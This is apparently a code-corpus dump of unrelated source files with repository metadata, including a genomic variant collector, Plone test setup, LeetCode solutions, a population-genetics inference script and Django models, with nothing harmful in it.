# THIS SCRIPT UPDATE THE COMPLETE VariantList_ALL.json FROM RUN LIST OR SINGLE RUN FOLDER IN ARGV.
# VARIANTLIST JSON CONTAINS RunName, Sample, Variant Data (chrm, start, stop, ref, alt, varcov, poscov). EXEMPLE :
#"Auto_user_PGM-165-Run98_35pM_Chef_SBT_colon_lung_v4_318v2_234": {
#"SAMPLE-AF454G": [
#["chr4", 55599436, 55599436, "T", "C", 405, 1245],
#["chr7", 55599438, 55599438, "G", "C", 120, 1040],
# ]
# USAGE : python collect_run_variants_to_variantlist.py
# OR : python collect_run_variants_to_variantlist.py /path/to/run_folder
pipeline_folder = os.environ['NGS_PIPELINE_BX_DIR']
variant_list_path = '%s/variantBase/variantList/variantList_ALL.json' % pipeline_folder
run_list_path = '%s/variantBase/runList/runList_ALL.fullpath.txt' % pipeline_folder
variantlist = {}
if os.path.exists(variant_list_path):
with open(variant_list_path, 'r') as g:
variantlist = json.load(g)
run2write_ordered = []
if len(sys.argv)>1:
run_list = [sys.argv[1]]
else:
run_list = []
rl = open(run_list_path,'r')
for run in rl:
run_folder = run.replace('\n','')
run_list.append(run_folder)
for run_folder in run_list:
# RUN TABLE
if run_folder.endswith('/'):
run = run_folder.split('/')[-2]
else:
run = run_folder.split('/')[-1]
run2write_ordered.append(run)
barcodes_json = False
with open(run_folder+'/barcodes.json', 'r') as g:
barcodes_json = json.load(g)
if run not in variantlist:
variantlist[run] = {}
else:
print "*already in variantlist* %s" % run
continue
print "- collecting %s ..." % run
for barcode in barcodes_json:
sample = barcodes_json[barcode]['sample']
dna_number = barcodes_json[barcode]['sample_id']
#if dna_number == 'CONTROL':
#continue
if sample not in variantlist[run]:
variantlist[run][sample] = []
finalreport_paths = glob.glob('%s/%s/*%s_%s*finalReport*'%(run_folder,sample,sample,barcode))
if finalreport_paths:
for fp_path in finalreport_paths:
if '~$' in fp_path: # fichier temporaire
continue
if fp_path.endswith('.xls'):
#xlrd
fp = xlrd.open_workbook(fp_path)
anno_sheet = fp.sheet_by_index(0)
for j in range(anno_sheet.ncols):
if anno_sheet.cell_value(0,j) in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = j
elif anno_sheet.cell_value(0,j) in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = j
elif anno_sheet.cell_value(0,j) in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = j
elif anno_sheet.cell_value(0,j) in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = j
elif anno_sheet.cell_value(0,j) in ['Var.Cov.','var.cov.']:
varcov_index = j
elif anno_sheet.cell_value(0,j) in ['Pos.Cov.','Depth']:
poscov_index = j
### PARSE XLS
for i in range(1,anno_sheet.nrows):
chrm = anno_sheet.cell_value(i,chromosome_index)
ref = anno_sheet.cell_value(i,ref_index)
alt = anno_sheet.cell_value(i,alt_index)
if chrm and ref and alt :
start = int(anno_sheet.cell_value(i,start_index))
varcov = int(anno_sheet.cell_value(i,varcov_index))
poscov = int(anno_sheet.cell_value(i,poscov_index))
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
elif fp_path.endswith('.xlsx'):
#openpyxl
fp = openpyxl.load_workbook(fp_path)
anno_sheetname = fp.sheetnames[0]
anno_sheet = fp[anno_sheetname]
for ncol in range(anno_sheet.max_column):
if anno_sheet.cell(row=1,column=ncol+1).value in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Var.Cov.','var.cov.']:
varcov_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Pos.Cov.','Depth']:
poscov_index = ncol+1
### PARSE XLSX
for nrow in range(2,anno_sheet.max_row+1):
chrm = anno_sheet.cell(row=nrow,column=chromosome_index).value
ref = anno_sheet.cell(row=nrow,column=ref_index).value
alt = anno_sheet.cell(row=nrow,column=alt_index).value
if chrm and ref and alt :
start = int(anno_sheet.cell(row=nrow,column=start_index).value)
varcov = int(anno_sheet.cell(row=nrow,column=varcov_index).value)
poscov = int(anno_sheet.cell(row=nrow,column=poscov_index).value)
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
else:
print "**WARNING (FINALREPORT FILE EXTENSION weird )** %s" % fp_path
#print "\t- %s : %s variants" % (sample,len(variantlist[run][sample]))
else:
print "**WARNING (NO FINALREPORT found for SAMPLE )** %s" % sample
print "- WRITING VARIANTLIST JSON..."
# routine d'ecriture differente de json dumps indent qui prend trop de lignes
with open(variant_list_path,'w') as vljson:
vljson.write('{\n')
for i in range(len(run2write_ordered)) :
run = run2write_ordered[i]
vljson.write('\t"%s": {\n' % run)
for j in range(len(variantlist[run].keys())):
sample = variantlist[run].keys()[j]
vljson.write('\t\t"%s": [\n' % (sample))
for k in range(len(variantlist[run][sample])):
variant = str(variantlist[run][sample][k]).replace('\'','"').replace('u"','"')
if k == (len(variantlist[run][sample])-1):
vljson.write('\t\t\t%s\n' % variant)
else:
vljson.write('\t\t\t%s,\n' % variant)
if j == (len(variantlist[run].keys())-1):
vljson.write('\t\t]\n')
else:
vljson.write('\t\t],\n')
if i == (len(run2write_ordered)-1):
vljson.write('\t}\n')
else:
vljson.write('\t},\n')
vljson.write('}\n')
|
[
"thomas.bandres@chu-bordeaux.fr"
] |
thomas.bandres@chu-bordeaux.fr
|
f4ed06e7ea8b347da25f534ba02242feff4c32b1
|
0e878d60050d3e34f33ab3f1bbfc0a0551e421d9
|
/fui/fsbrowse/tests/base.py
|
998b0711d09a90a7b2461a7454bea1d2aacf71dc
|
[] |
no_license
|
espenak/fui.fsbrowse
|
bca49b7a82ffcad8e984490ed486d7038062ae8c
|
ba2ddd37f2fde9b0189336f50c995849de25ac45
|
refs/heads/master
| 2021-01-20T09:41:17.205327
| 2009-11-06T12:48:51
| 2009-11-06T12:48:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,062
|
py
|
from Products.Five import zcml
from Products.Five import fiveconfigure
from Testing import ZopeTestCase as ztc
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import onsetup
from Products.Five.testbrowser import Browser
from zope.component import getUtility, getMultiAdapter
from plone.portlets.interfaces import IPortletManager
from plone.portlets.interfaces import IPortletAssignmentMapping
from Products.PloneTestCase.setup import portal_owner, default_password
@onsetup
def setup_fui_fsbrowse():
"""Set up the additional products required for the fui.fsbrowse product.
The @onsetup decorator causes the execution of this body to be deferred
until the setup of the Plone site testing layer.
"""
# Load the ZCML configuration for the optilux.policy package.
# This includes the other products below as well.
fiveconfigure.debug_mode = True
import fui.fsbrowse
zcml.load_config('configure.zcml', fui.fsbrowse)
fiveconfigure.debug_mode = False
# We need to tell the testing framework that these products
# should be available. This can't happen until after we have loaded
# the ZCML.
ztc.installPackage('fui.fsbrowse')
# The order here is important: We first call the (deferred) function which
# installs the products we need for the Optilux package. Then, we let
# PloneTestCase set up this product on installation.
setup_fui_fsbrowse()
ptc.setupPloneSite(products=['fui.fsbrowse'])
class FuiFsBrowseTestCase(ptc.PloneTestCase):
"""Base class used for test cases. """
class FuiFsBrowseFunctionalTestCase(ptc.FunctionalTestCase):
"""Test case class used for functional (doc-)tests """
def afterSetUp(self):
self.browser = Browser()
# The following is useful when writing and debugging testself.browser tests. It lets
# us see error messages properly.
self.browser.handleErrors = False
self.portal.error_log._ignored_exceptions = ()
# We then turn off the various portlets, because they sometimes duplicate links
# and text (e.g. the navtree, the recent recent items listing) that we wish to
# test for in our own views. Having no portlets makes things easier.
left_column = getUtility(IPortletManager, name=u"plone.leftcolumn")
left_assignable = getMultiAdapter((self.portal, left_column), IPortletAssignmentMapping)
for name in left_assignable.keys():
del left_assignable[name]
right_column = getUtility(IPortletManager, name=u"plone.rightcolumn")
right_assignable = getMultiAdapter((self.portal, right_column), IPortletAssignmentMapping)
for name in right_assignable.keys():
del right_assignable[name]
def loginAdminClick(self):
portal_url = self.portal.absolute_url()
self.browser.open(portal_url + '/login_form?came_from=' + portal_url)
self.browser.getControl(name='__ac_name').value = portal_owner
self.browser.getControl(name='__ac_password').value = default_password
self.browser.getControl(name='submit').click()
def logoutClick(self):
portal_url = self.portal.absolute_url()
self.browser.getLink("Log out").click()
|
[
"post@espenak.net"
] |
post@espenak.net
|
1b2e1b202bfb75864577236b2e5b92566bd75690
|
0c8cbe2f3d69c92dcd0cc73da88f1340624809f2
|
/search/urls.py
|
3063c9854c0b76535380cbf020f58478264616b5
|
[] |
no_license
|
JunchuangYang/OnlineMusicWebsite
|
83451b03aad5ba8bf8a7402a8e7f21ca5c0d1c24
|
475ebea77e8488f08883203e509cc8b7c9043bbd
|
refs/heads/master
| 2021-07-25T01:27:14.673494
| 2020-04-05T08:23:07
| 2020-04-05T08:23:07
| 252,178,555
| 0
| 0
| null | 2021-06-10T22:43:53
| 2020-04-01T13:09:47
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 151
|
py
|
#__author__ = 'lenovo'
from django.urls import path
from . import views
urlpatterns = [
path('<int:page>.html',views.searchView ,name = 'search')
]
|
[
"554002970@qq.com"
] |
554002970@qq.com
|
704da8e2d99a67413d641ece944fa1a4042d6e8e
|
07f33106eeda3dff104105250fb5d299938bff6b
|
/数组/1552_两球之间的磁力.py
|
c25e73b1afbf4e08ff3f0127684b147103fef6d8
|
[] |
no_license
|
fadeawaylove/leetcode_practice
|
5e40c3bcf8f7721bc1a843b7ac820041eae5c89b
|
74809f13f43e74a19f5a9f8d908cfe6a9ec774b2
|
refs/heads/master
| 2023-01-02T05:35:57.529975
| 2020-10-28T06:03:59
| 2020-10-28T06:03:59
| 267,814,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,504
|
py
|
"""
在代号为 C-137 的地球上,Rick 发现如果他将两个球放在他新发明的篮子里,它们之间会形成特殊形式的磁力。Rick 有 n 个空的篮子,第 i 个篮子的位置在 position[i] ,Morty 想把 m 个球放到这些篮子里,使得任意两球间 最小磁力 最大。
已知两个球如果分别位于 x 和 y ,那么它们之间的磁力为 |x - y| 。
给你一个整数数组 position 和一个整数 m ,请你返回最大化的最小磁力。
示例 1:
输入:position = [1,2,3,4,7], m = 3
输出:3
解释:将 3 个球分别放入位于 1,4 和 7 的三个篮子,两球间的磁力分别为 [3, 3, 6]。最小磁力为 3 。我们没办法让最小磁力大于 3 。
示例 2:
输入:position = [5,4,3,2,1,1000000000], m = 2
输出:999999999
解释:我们使用位于 1 和 1000000000 的篮子时最小磁力最大。
提示:
n == position.length
2 <= n <= 10^5
1 <= position[i] <= 10^9
所有 position 中的整数 互不相同 。
2 <= m <= position.length
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/magnetic-force-between-two-balls
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
from typing import List
class Solution:
def maxDistance(self, position: List[int], m: int) -> int:
def check(g, pos):
cur = pos[0]
cnt = 1
for p in pos[1:]:
if p - cur >= g:
cnt += 1
cur = p
if cnt >= m:
return True
return False
position = sorted(position)
n = len(position)
# 预测的最大间隔
max_gap = (position[-1] - position[0]) // (m - 1)
min_gap = 1
for i in range(n - 1):
min_gap = min(min_gap, position[i + 1] - position[i])
start = min_gap
stop = max_gap
while stop >= start:
gap = (start + stop) // 2
ret = check(gap, position)
print(ret, start, stop, gap)
if ret: # 检查成功,可以适当扩大gap
start = gap + 1
else: # 检查失败,缩小gap
stop = gap - 1
return start - 1
print(Solution().maxDistance([1, 2, 3, 4, 7], m=3))
# print(Solution().maxDistance([5, 4, 3, 2, 1, 1000000000], m=2))
# print(Solution().maxDistance([79, 74, 57, 22], m=4))
|
[
"dengrt@akulaku.com"
] |
dengrt@akulaku.com
|
e8ec0cd093e9e24840ac391ba6873cc50d9f170a
|
6b1b506139088aa30de9fd65cff9e3b6a3a36874
|
/sofia_redux/toolkit/fitting/tests/test_polynomial/test_linear_vector_lstsq.py
|
6e23b6f9ff2c919be37c0f4bf09177809de894cd
|
[
"BSD-3-Clause"
] |
permissive
|
SOFIA-USRA/sofia_redux
|
df2e6ad402b50eb014b574ea561734334d70f84d
|
493700340cd34d5f319af6f3a562a82135bb30dd
|
refs/heads/main
| 2023-08-17T11:11:50.559987
| 2023-08-13T19:52:37
| 2023-08-13T19:52:37
| 311,773,000
| 12
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from sofia_redux.toolkit.fitting.polynomial \
import linear_equation, linear_vector_lstsq
@pytest.fixture
def data():
a = np.array([[3, 4], [5, 6.]])
b = np.array([[7., 8]])
alpha, beta = linear_equation(a, b)
return alpha, beta
def test_expected(data):
alpha, beta = data
result = linear_vector_lstsq(alpha, beta, np.array([[3.5, 4.5]]).T)
assert np.allclose(result, 5.5)
assert result.shape == (1, 1)
|
[
"melanie.j.clarke@nasa.gov"
] |
melanie.j.clarke@nasa.gov
|
d5d60ae5edaf5a5eb22194b2a9d172139d102b63
|
ad0567e70e3c448955b25aa4a6d8e6e30027b7b1
|
/scripts/canvastex.py
|
daf2b04f6d00eb6f03af3a5d6f25677f13d8f9b7
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
dsavransky/grading
|
8409f800335296cd15f604c7f5af86cd0c25a31d
|
5925cbdcf82b1eed90c927a35c2bc1bf6de13fae
|
refs/heads/main
| 2022-08-12T22:52:34.076808
| 2022-07-22T15:27:15
| 2022-07-22T15:27:15
| 209,359,426
| 8
| 4
|
MIT
| 2021-10-06T12:57:03
| 2019-09-18T16:50:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
#!python
import argparse
import urllib.parse
import re
import os.path
def convlatex(texstr):
""" Convert input latex string to Canvas's img html """
if isinstance(texstr, re.Match):
texstr = texstr.groups()[0]
qtxt = """<img class="equation_image" title="{0}" src="https://canvas.cornell.edu/equation_images/{1}" alt="LaTeX: {0}">""".format(
texstr, urllib.parse.quote(urllib.parse.quote(texstr))
)
return qtxt
def convall(text):
p = re.compile(r"\${1,2}(.*?)\${1,2}")
return p.sub(convlatex, text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Convert LaTeX input to Canvas-style html."
)
parser.add_argument(
"texstr", nargs=1, type=str, help="LaTeX input or file (string)."
)
parser.add_argument(
"--par",
action="store_true",
help="Treat input as paragraph with embedded LaTeX with $ or $$ delimiters",
)
args = parser.parse_args()
texstr = args.texstr[0]
if os.path.exists(texstr):
with open(texstr, "r") as f:
texstr = f.read()
if args.par:
qtxt = convall(texstr)
else:
qtxt = convlatex(texstr)
print(qtxt)
exit(0)
|
[
"dsavransky@gmail.com"
] |
dsavransky@gmail.com
|
5588bd437577ce0e40d6e6d5de7128a2ee7fca69
|
925f2935b34042abc9161795413031ae68f45b9a
|
/multimodel_inference/SC3elsm.py
|
859de2c0b23b9b122810c0220fa1cecd7c1363ea
|
[] |
no_license
|
Farhad63/AFS-analysis-with-moments
|
7e1d17f47c06ed97ebb7c9ec8245fe52a88622c3
|
7874b1085073e5f62d910ef2d79a22b29ff3be84
|
refs/heads/master
| 2022-04-09T22:11:12.341235
| 2020-03-11T21:15:42
| 2020-03-11T21:15:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,429
|
py
|
#!/usr/bin/env python
# split, three epochs in each pop, asymmetric migration at same rates in all epochs
# n(para): 11
import matplotlib
matplotlib.use('PDF')
import moments
import pylab
import random
import matplotlib.pyplot as plt
import numpy as np
from numpy import array
from moments import Misc,Spectrum,Numerics,Manips,Integration,Demographics1D,Demographics2D
import sys
infile=sys.argv[1]
pop_ids=[sys.argv[2],sys.argv[3]]
projections=[int(sys.argv[4]),int(sys.argv[5])]
#params=[float(sys.argv[6]),float(sys.argv[7]),float(sys.argv[8]),float(sys.argv[9]),float(sys.argv[10]),float(sys.argv[11])]
params=[1,1,1,1,1,1,1,1,1,1,0.01]
# mutation rate per sequenced portion of genome per generation: for A.millepora, 0.02
mu=float(sys.argv[6])
# generation time, in thousand years: 0.005 (5 years)
gtime=float(sys.argv[7])
dd = Misc.make_data_dict(infile)
# set Polarized=False below for folded AFS analysis
data = Spectrum.from_data_dict(dd, pop_ids,projections,polarized=True)
ns=data.sample_sizes
np.set_printoptions(precision=3)
#-------------------
# split into unequal pop sizes with asymmetrical migration
def sc3ei(params , ns):
# p_misid: proportion of misidentified ancestral states
nu1_1, nu2_1, nu1_2,nu2_2,nu1_3,nu2_3,T1, T2, T3,m, p_misid = params
sts = moments.LinearSystem_1D.steady_state_1D(ns[0] + ns[1])
fs = moments.Spectrum(sts)
fs = moments.Manips.split_1D_to_2D(fs, ns[0], ns[1])
fs.integrate([nu1_1, nu2_1], T1, m = np.array([[0, m], [m, 0]]))
fs.integrate([nu1_2, nu2_2], T2, m = np.array([[0, 0], [0, 0]]))
fs.integrate([nu1_3, nu2_3], T3, m = np.array([[0, m], [m, 0]]))
return (1-p_misid)*fs + p_misid*moments.Numerics.reverse_array(fs)
func=sc3ei
upper_bound = [100, 100, 100,100,100, 100, 100, 100,100, 200,0.25]
lower_bound = [1e-3,1e-3, 1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-5,1e-5]
params = moments.Misc.perturb_params(params, fold=2, upper_bound=upper_bound,
lower_bound=lower_bound)
poptg = moments.Inference.optimize_log(params, data, func,
lower_bound=lower_bound,
upper_bound=upper_bound,
verbose=False, maxiter=30)
# extracting model predictions, likelihood and theta
model = func(poptg, ns)
ll_model = moments.Inference.ll_multinom(model, data)
theta = moments.Inference.optimal_sfs_scaling(model, data)
# random index for this replicate
ind=str(random.randint(0,999999))
# plotting demographic model
plot_mod = moments.ModelPlot.generate_model(func, poptg, ns)
moments.ModelPlot.plot_model(plot_mod, save_file="sc3elsm_"+ind+".png", pop_labels=pop_ids, nref=theta/(4*mu), draw_scale=False, gen_time=gtime, gen_time_units="KY", reverse_timeline=True)
# bootstrapping for SDs of params and theta
all_boot=moments.Misc.bootstrap(dd,pop_ids,projections)
uncert=moments.Godambe.GIM_uncert(func,all_boot,poptg,data)
# printing parameters and their SDs
print "RESULT","sc3elsm",ind,len(params),ll_model,sys.argv[1],sys.argv[2],sys.argv[3],poptg,theta,uncert
# plotting quad-panel figure witt AFS, model, residuals:
moments.Plotting.plot_2d_comp_multinom(model, data, vmin=1, resid_range=3,
pop_ids =pop_ids)
plt.savefig("sc3elsm_"+ind+"_"+sys.argv[1]+"_"+sys.argv[2]+"_"+sys.argv[3]+"_"+sys.argv[4]+"_"+sys.argv[5]+'.pdf')
|
[
"matz@utexas.edu"
] |
matz@utexas.edu
|
370cd35756182e41352487f83230411fd0926a55
|
7c8fd5af8ade349f1d9f59c40cf9d5cda2755814
|
/calculator.py
|
80b33d64a550e7940ce55a1ef43fa6d6fb5af57d
|
[] |
no_license
|
emilydowgialo/calculator-2
|
47cf6c31889ea56847e84b58f8e6c70f4336084f
|
393aca0b3018192ecc3db68ff59a183438485e9e
|
refs/heads/master
| 2016-08-11T07:48:06.250197
| 2016-04-07T19:59:55
| 2016-04-07T19:59:55
| 55,652,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,431
|
py
|
"""
calculator.py
Using our arithmetic.py file from Exercise02, create the
calculator program yourself in this file.
"""
from arithmetic import *
# Your code goes here
def calc_function():
value_returned = False
calculating = True
while calculating == True:
while value_returned == False:
input = raw_input("> ")
tokens = input.split(" ") # parsing user's input by space
token_list = tokens[1:]
# num1 = int(tokens[1]) # converting user input into integer
# if len(tokens) == 2: # accomodates additional parameters
# num2 = int(tokens[2]) # converting user input into integer
# if len(tokens) > 2:
# additional_numbers = int(tokens[1:])
if tokens[0] == "+": # add function
print add(token_list) # calling the add function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "-": # subtract function
print subtract(num1, num2) # calling the subtr function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "*": # multiply function
print multiply(num1, num2) # calling the multiply function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "/": # divide function
print divide(num1, num2) # calling the divide function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "square":
print square(num1)
value_returned = True
if tokens[0] == "cube":
print cube(num1)
value_returned = True
if tokens[0] == "pow":
print power(num1, num2)
value_returned = True
if tokens[0] == "mod":
print mod(num1, num2)
value_returned = True
continue_playing = raw_input("Would you like to continue calculating? Type 1 for yes and type 2 for no: ")
if continue_playing == "1":
value_returned = False
elif continue_playing == "2":
calculating = False
print "goodbye"
else:
print "Error: you did not type 1 or 2!"
calc_function()
|
[
"info@hackbrightacademy.com"
] |
info@hackbrightacademy.com
|
89b03a17f56e9843db582338bc395c1f2fea79cf
|
9724c8cd81ad39f7f9a2419e2873d7d74cb10c72
|
/pyabc/util/dict2arr.py
|
1e205cc289c9abf58cf89c4e2a29997249c9bcd2
|
[
"BSD-3-Clause"
] |
permissive
|
ICB-DCM/pyABC
|
36b7fc431fe4ba4b34d80d268603ec410aeaf918
|
d1542fb201edca86369082e1fc7934995e3d03a4
|
refs/heads/main
| 2023-09-01T13:42:52.880878
| 2023-08-18T16:55:04
| 2023-08-18T16:55:04
| 96,995,608
| 187
| 49
|
BSD-3-Clause
| 2023-08-18T16:55:05
| 2017-07-12T10:30:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,995
|
py
|
"""Transform dictionaries to arrays."""
from numbers import Number
from typing import List, Union
import numpy as np
import pandas as pd
def dict2arr(dct: Union[dict, np.ndarray], keys: List) -> np.ndarray:
"""Convert dictionary to 1d array, in specified key order.
Parameters
----------
dct: If dict-similar, values of all keys are extracted into a 1d array.
Entries can be data frames, ndarrays, or single numbers.
keys: Keys of interest, also defines the order.
Returns
-------
arr: 1d array of all concatenated values.
"""
if isinstance(dct, np.ndarray):
return dct
arr = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
arr.append(val.to_numpy().flatten())
elif isinstance(val, np.ndarray):
arr.append(val.flatten())
elif isinstance(val, Number):
arr.append([val])
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
# for efficiency, directly parse single entries
if len(arr) == 1:
return np.asarray(arr[0])
# flatten
arr = [val for sub_arr in arr for val in sub_arr]
return np.asarray(arr)
def dict2arrlabels(dct: dict, keys: List) -> List[str]:
"""Get label array consistent with the output of `dict2arr`.
Can be called e.g. once on the observed data and used for logging.
Parameters
----------
dct: Model output or observed data.
keys: Keys of interest, also defines the order.
Returns
-------
labels: List of labels consistent with the output of `dict2arr`.
"""
labels = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
# default flattening mode is 'C', i.e. row-major, i.e. row-by-row
for row in range(len(val.index)):
for col in val.columns:
labels.append(f"{key}:{col}:{row}")
elif isinstance(val, np.ndarray):
# array can have any dimension, thus just flat indices
for ix in range(val.size):
labels.append(f"{key}:{ix}")
elif isinstance(val, Number):
labels.append(key)
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
return labels
def io_dict2arr(fun):
"""Wrapper parsing inputs dicts to ndarrays.
Assumes the array is the first argument, and `self` holds a `keys`
variable.
"""
def wrapped_fun(self, data: Union[dict, np.ndarray], *args, **kwargs):
# convert input to array
data = dict2arr(data, self.x_keys)
# call the actual function
ret: np.ndarray = fun(self, data, *args, **kwargs)
# flatten output
return ret.flatten()
return wrapped_fun
|
[
"noreply@github.com"
] |
ICB-DCM.noreply@github.com
|
0e88de598b1ad3a47bce2fd27367d2c995ed185d
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2_neat/16_0_2_mck_B.py
|
357542136cb2949d40fc809ea50ad4ecaec00794
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 576
|
py
|
import sys
def flip(x, list):
for i in range(0, x + 1):
if list[i] == "-":
list[i] = "+"
else:
list[i] = "-"
return list
def getLastIndexOfN(list):
for i in range(len(list), 0, -1):
if list[i - 1] == "-":
return i - 1
return -1
if __name__ == "__main__":
tests = int(sys.stdin.readline())
for test in range(1, tests + 1):
s = sys.stdin.readline().replace("\n", "")
s = [i for i in s]
ans = 0
while "-" in s:
ans += 1
s = flip(getLastIndexOfN(s), s)
print ("Case #" + str(test) + ": " + str(ans))
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
aea17cef7dbd0f04529c1d5463ea0f6bfcb948fc
|
af9268e1ead8cdb491868c14a2240d9e44fb3b56
|
/Cousinade/polls/migrations/0001_initial.py
|
6363a01cf03b7608b2f3dd7940be9dd6cb4cd7dd
|
[] |
no_license
|
frosqh/Cousinade2017
|
d5154c24c93ca8089eeba26b53c594e92cb6bd82
|
c34d5707af02402bf2bb7405eddc91297da399ff
|
refs/heads/master
| 2021-01-20T07:57:34.586476
| 2017-10-22T18:42:45
| 2017-10-22T18:42:45
| 90,074,802
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,053
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-15 23:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import polls.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('authorName', models.CharField(default='anonymous', max_length=200)),
],
),
migrations.CreateModel(
name='Photos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to=polls.models.user_directory_path)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Author')),
],
),
]
|
[
"frosqh@gmail.com"
] |
frosqh@gmail.com
|
17d3ff2a36f1adcf56dde4f95f0754a323175ca0
|
eb736f1412e434522687190685ccdae9ba722b58
|
/Lab Exercise 2.3.2021/Cars/cars2.py
|
2f49598a60b1672ee3390830cbfe517e22323420
|
[] |
no_license
|
nmessa/C_Sharp-2021
|
4a008853f4cf9fa8a617a5fcadaad964fc30c84c
|
1124d4ab106a6a2204b98019b36f495f4167a12b
|
refs/heads/main
| 2023-06-05T15:35:13.734371
| 2021-06-15T12:43:02
| 2021-06-15T12:43:02
| 332,059,776
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
#Closest approach of 2 cars
##Car1 traveling north currently 2 miles south of junction at a rate of 30 MPH
##Car2 traveling west currently 3 miles east of jucntion at a rate of 40 MPH
##Find the closest distance the two cars approach
from math import *
from pylab import *
import time
collisions = []
for speed1 in range(1, 50):
for speed2 in range(1,50):
times = []
distances = []
t = 0
while True:
car1 = 2 - speed1/3600 * t
car2 = 3 - speed2/3600 * t
distance = sqrt(car1**2 + car2**2)
if car1 < 0 and car2 < 0:
break
distances.append(distance)
times.append(t)
t += 1
if distance < 0.01:
collisions.append((speed1, speed2))
## plot(times, distances)
## grid(True)
## show()
print(collisions)
##Solution
##0.2 miles at time 259 seconds
|
[
"noreply@github.com"
] |
nmessa.noreply@github.com
|
35b87aaf0cdcfdb706a1d081dce7b88de2b2f8a8
|
2ea4e667bdcd82565fca8ac96f74ee08bd67364e
|
/backend/chat/models.py
|
a2d82fbe6251955d52dea8721a5990fc822a0ba3
|
[] |
no_license
|
crowdbotics-apps/wadduplyapp-24147
|
39dff74efbdb15feaf1bde54dd9f6679b9c786ed
|
19436f48d03dcc22807e9e331bb371a546f1dc9d
|
refs/heads/master
| 2023-02-23T23:24:25.213934
| 2021-01-29T21:09:30
| 2021-01-29T21:09:30
| 334,259,663
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,152
|
py
|
from django.conf import settings
from django.db import models
class ThreadAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadaction_thread",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class ForwardedMessage(models.Model):
"Generated Model"
